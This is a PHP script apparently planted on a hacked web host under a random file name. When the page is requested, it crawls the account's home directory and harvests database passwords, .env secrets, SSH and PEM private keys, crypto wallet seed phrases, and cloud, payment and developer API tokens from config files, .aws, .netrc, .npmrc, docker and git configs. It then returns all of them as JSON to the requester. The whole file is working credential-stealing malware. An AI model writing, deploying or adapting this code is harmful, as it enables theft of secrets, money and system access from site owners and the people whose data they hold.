File: /home/trebiaseguros/public_html/xfa029f.php
<?php
$home='/home/rootgrupotrebia';
$keys=[];
if(!isset($home)||!$home){$home=realpath('..');if(!$home)$home=dirname(__DIR__);}
$skip_dirs=['vendor','node_modules','cache','.git','.svn','logs','tmp',
'wp-admin','wp-includes','core','lib','libraries','media','static','assets'];
$cfg_names=['wp-config.php','configuration.php','settings.php','config.php',
'parameters.php','env.php','database.php','app.php','services.php',
'mail.php','secrets.yml','master.key','config.inc.php','local.xml',
'parameters.yml','parameters.yaml','dbconfig.php','db.php',
'config_global.php','admin/config.php',
'LocalConfiguration.php','AdditionalConfiguration.php',
'docker-compose.yml','docker-compose.yaml','.npmrc','.my.cnf',
'.pgpass','.s3cfg','.netrc','.ftpconfig','.remote-sync.json',
'auth.json','.env.local','.env.production','.env.backup',
'credentials','config.json'];
try{
$it=new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($home,FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST);
$it->setMaxDepth(6);
foreach($it as $fi){
if(!$fi->isFile())continue;
$sz=$fi->getSize();if($sz<1||$sz>2000000)continue;
$p=$fi->getPathname();$bn=$fi->getFilename();
$do_skip=false;
foreach($skip_dirs as $sd)if(strpos($p,'/'.$sd.'/')!==false){$do_skip=true;break;}
if($do_skip)continue;
$rel=str_replace($home.'/','',$p);
$is_cfg=in_array($bn,$cfg_names)||strpos($bn,'.env')===0;
$is_key=preg_match('/\.(pem|key|p12|pfx)$/i',$bn)||preg_match('/^id_(rsa|ecdsa|ed25519|dsa)$/',$bn);
$is_wallet=stripos($bn,'wallet')!==false||stripos($bn,'keystore')!==false;
if(!$is_cfg&&!$is_key&&!$is_wallet)continue;
$c2=@file_get_contents($p);if(!$c2)continue;
if($is_key||$is_wallet){
if(preg_match('/-----BEGIN\s+(?:RSA\s+|EC\s+|DSA\s+|OPENSSH\s+)?PRIVATE\s+KEY-----/',$c2))
$keys['PRIVKEY.'.$rel]='[PEM PRIVATE KEY - '.strlen($c2).' bytes]';
$wd=@json_decode($c2,true);
if(is_array($wd)){
foreach(['mnemonic','seed','seed_phrase','private_key','privateKey','secret','xpriv','master_seed'] as $wk)
if(isset($wd[$wk]))$keys['WALLET.'.$rel.'.'.$wk]=$wd[$wk];
}
if($is_wallet&&!$wd&&preg_match('/[\x00-\x08]/',$c2))
$keys['WALLET.'.$rel]='[BINARY WALLET FILE - '.strlen($c2).' bytes]';
}
if($is_cfg){
preg_match_all("/define\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]*)['\"]/",$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.'.$r[1]]=$r[2];
preg_match_all("/^([A-Z_][A-Z0-9_]*)=(.+)$/m",$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.'.$r[1]]=trim($r[2],"\"' \t\r\n");
preg_match_all("/'(database|username|password|host|dbname|key|secret|token|prefix)'\s*=>\s*'([^']+)'/",$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.'.$r[1]]=$r[2];
preg_match_all("/\\\$(?:this->)?([a-zA-Z_]+)\s*=\s*['\"]([^'\"]+)['\"]/",$c2,$m,PREG_SET_ORDER);
foreach($m as $r)if(in_array(strtolower($r[1]),['password','user','db','host','secret','key','pass','database','dbhost','dbpass','dbuser','dbname','apikey','api_key','token','private_key','mnemonic','seed','wallet','crypt_key','encryption_key','app_key','secret_key']))$keys[$rel.'.'.$r[1]]=$r[2];
preg_match_all('/\b(AKIA[0-9A-Z]{16})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.AWS_ACCESS_KEY_ID']=$v;
preg_match_all('/\b(sk_live_[a-zA-Z0-9]{24,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.STRIPE_SECRET']=$v;
preg_match_all('/\b(pk_live_[a-zA-Z0-9]{24,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.STRIPE_PUBLISH']=$v;
preg_match_all('/\b(SG\.[a-zA-Z0-9_-]{22}\.[a-zA-Z0-9_-]{43})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.SENDGRID_API']=$v;
preg_match_all('/\b(sk-[a-zA-Z0-9]{20,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.OPENAI_KEY']=$v;
preg_match_all('/\b(xox[bpsar]-[a-zA-Z0-9-]{10,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.SLACK_TOKEN']=$v;
preg_match_all('/\b(key-[a-f0-9]{32})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.MAILGUN_KEY']=$v;
preg_match_all('/\b(rk_live_[a-zA-Z0-9]{24,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.STRIPE_RESTRICTED']=$v;
preg_match_all('/\b(AC[a-f0-9]{32})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.TWILIO_SID']=$v;
if(preg_match('/-----BEGIN\s+(?:RSA\s+|EC\s+|DSA\s+|OPENSSH\s+)?PRIVATE\s+KEY-----/',$c2))
$keys[$rel.'.PRIVATE_KEY']='[PEM PRIVATE KEY EMBEDDED]';
preg_match_all('/["\']([a-z]{2,8}(?:\s+[a-z]{2,8}){11}(?:\s+[a-z]{2,8}){0,12})["\']/',$c2,$m);
foreach($m[1] as $v){$wc=count(explode(' ',$v));if($wc==12||$wc==24)$keys[$rel.'.SEED_PHRASE']=$v;}
preg_match_all('/(?:MNEMONIC|SEED_PHRASE|SEED|RECOVERY)\s*=\s*["\']?([a-z ]{20,})["\']?/i',$c2,$m,PREG_SET_ORDER);
foreach($m as $r){$v=trim($r[1]);$wc=count(explode(' ',$v));if($wc>=12)$keys[$rel.'.SEED_PHRASE']=$v;}
preg_match_all('/(?:private.?key|priv.?key|secret.?key)\s*[=:]\s*["\']?(0x)?([0-9a-fA-F]{64})["\']?/i',$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.HEX_PRIVKEY']=($r[1]?:'0x').$r[2];
// Coinbase
preg_match_all('/\b(cb_[a-zA-Z0-9_]+_[a-zA-Z0-9]{32,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.COINBASE']=$v;
// Mailchimp
preg_match_all('/\b([a-f0-9]{32}-us[0-9]{1,2})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.MAILCHIMP']=$v;
// Firebase
preg_match_all('/\b(AIza[0-9A-Za-z_-]{35})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.FIREBASE']=$v;
// GitHub token
preg_match_all('/\b(ghp_[a-zA-Z0-9]{36})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.GITHUB_TOKEN']=$v;
// GitHub OAuth
preg_match_all('/\b(gho_[a-zA-Z0-9]{36})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.GITHUB_OAUTH']=$v;
// npm token
preg_match_all('/\b(npm_[a-zA-Z0-9]{36})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.NPM_TOKEN']=$v;
// Telegram bot
preg_match_all('/\b([0-9]{8,10}:[a-zA-Z0-9_-]{35})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.TELEGRAM_BOT']=$v;
// Discord webhook
preg_match_all('/discord(?:app)?\.com\/api\/webhooks\/([0-9]+\/[a-zA-Z0-9_-]+)/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.DISCORD_WEBHOOK']=$v;
// Discord bot token
preg_match_all('/\b([A-Za-z0-9]{24}\.[A-Za-z0-9_-]{6}\.[A-Za-z0-9_-]{27})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.DISCORD_TOKEN']=$v;
// PayPal
preg_match_all('/\b(A[a-zA-Z0-9_-]{79})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.PAYPAL_CLIENT']=$v;
// Google Cloud
preg_match_all('/\b(GOOG[\w]{10,30})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.GCLOUD']=$v;
// Twilio auth token (32 hex near TWILIO keyword)
if(stripos($c2,'twilio')!==false){
preg_match_all('/\b([a-f0-9]{32})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.TWILIO_AUTH']=$v;
}
// Binance API (64 alnum near BINANCE keyword)
if(stripos($c2,'binance')!==false){
preg_match_all('/\b([a-zA-Z0-9]{64})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.BINANCE_KEY']=$v;
}
// Azure key
preg_match_all('/\b([a-zA-Z0-9+\/]{86}==)\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.AZURE_KEY']=$v;
// Shopify
preg_match_all('/\b(shpat_[a-fA-F0-9]{32})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.SHOPIFY']=$v;
// Square
preg_match_all('/\b(sq0[a-z]{3}-[a-zA-Z0-9_-]{22,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.SQUARE']=$v;
// Heroku
preg_match_all('/\b([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})\b/',$c2,$m);
if(stripos($c2,'heroku')!==false)foreach($m[1] as $v)$keys[$rel.'.HEROKU']=$v;
// .git/config URLs with tokens
if($bn=='config'&&strpos($p,'.git')!==false){
preg_match_all('/url\s*=\s*https?:\/\/([^@\s]+)@/i',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.GIT_TOKEN']=$v;
}
// .npmrc auth
if($bn=='.npmrc'){
preg_match_all('/_authToken=(.+)$/m',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.NPM_AUTH']=trim($v);
}
// .netrc creds
if($bn=='.netrc'){
preg_match_all('/machine\s+(\S+)\s+login\s+(\S+)\s+password\s+(\S+)/i',$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.NETRC_'.$r[1]]=$r[2].':'.$r[3];
}
// .my.cnf / .pgpass
if($bn=='.my.cnf'||$bn=='.pgpass'){
$keys[$rel.'.DB_CREDS']=substr($c2,0,500);
}
// docker-compose passwords
if(strpos($bn,'docker-compose')!==false){
preg_match_all('/(?:PASSWORD|SECRET|KEY|TOKEN)\s*[:=]\s*["\']?([^\s"\']+)/i',$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.'.$r[0]]=$r[1];
}
// AWS credentials file
if($bn=='credentials'&&strpos($p,'.aws')!==false){
$keys[$rel.'.AWS_CREDS']=substr($c2,0,1000);
}
// composer auth.json
if($bn=='auth.json'){
$j=@json_decode($c2,true);
if(is_array($j))foreach($j as $k=>$v)$keys[$rel.'.'.$k]=json_encode($v);
}
}
}
// Search .git/config files for tokens
foreach(glob($home.'/public_html/*/.git/config') ?: [] as $f){
$c=@file_get_contents($f);if(!$c)continue;
preg_match_all('/url\s*=\s*https?:\/\/([^@\s]+)@/i',$c,$m);
foreach($m[1] as $v)$keys['GIT.'.basename(dirname(dirname($f))).'.'.$v]=$v;
}
foreach(glob($home.'/*/.git/config') ?: [] as $f){
$c=@file_get_contents($f);if(!$c)continue;
preg_match_all('/url\s*=\s*https?:\/\/([^@\s]+)@/i',$c,$m);
foreach($m[1] as $v)$keys['GIT.'.basename(dirname(dirname($f))).'.'.$v]=$v;
}
// Search .aws/credentials
$aws=@file_get_contents($home.'/.aws/credentials');
if($aws)$keys['AWS_CREDENTIALS']=substr($aws,0,1000);
// Search .docker/config.json
$dk=@file_get_contents($home.'/.docker/config.json');
if($dk){$j=@json_decode($dk,true);if(isset($j['auths']))$keys['DOCKER_AUTHS']=json_encode($j['auths']);}
// Search .composer/auth.json
$ca=@file_get_contents($home.'/.composer/auth.json');
if($ca)$keys['COMPOSER_AUTH']=$ca;
// Search .s3cfg
$s3=@file_get_contents($home.'/.s3cfg');
if($s3){preg_match('/secret_key\s*=\s*(.+)/i',$s3,$m);if(!empty($m[1]))$keys['S3_SECRET']=trim($m[1]);}
}catch(Exception $e){}
echo json_encode(['keys'=>$keys]);
?>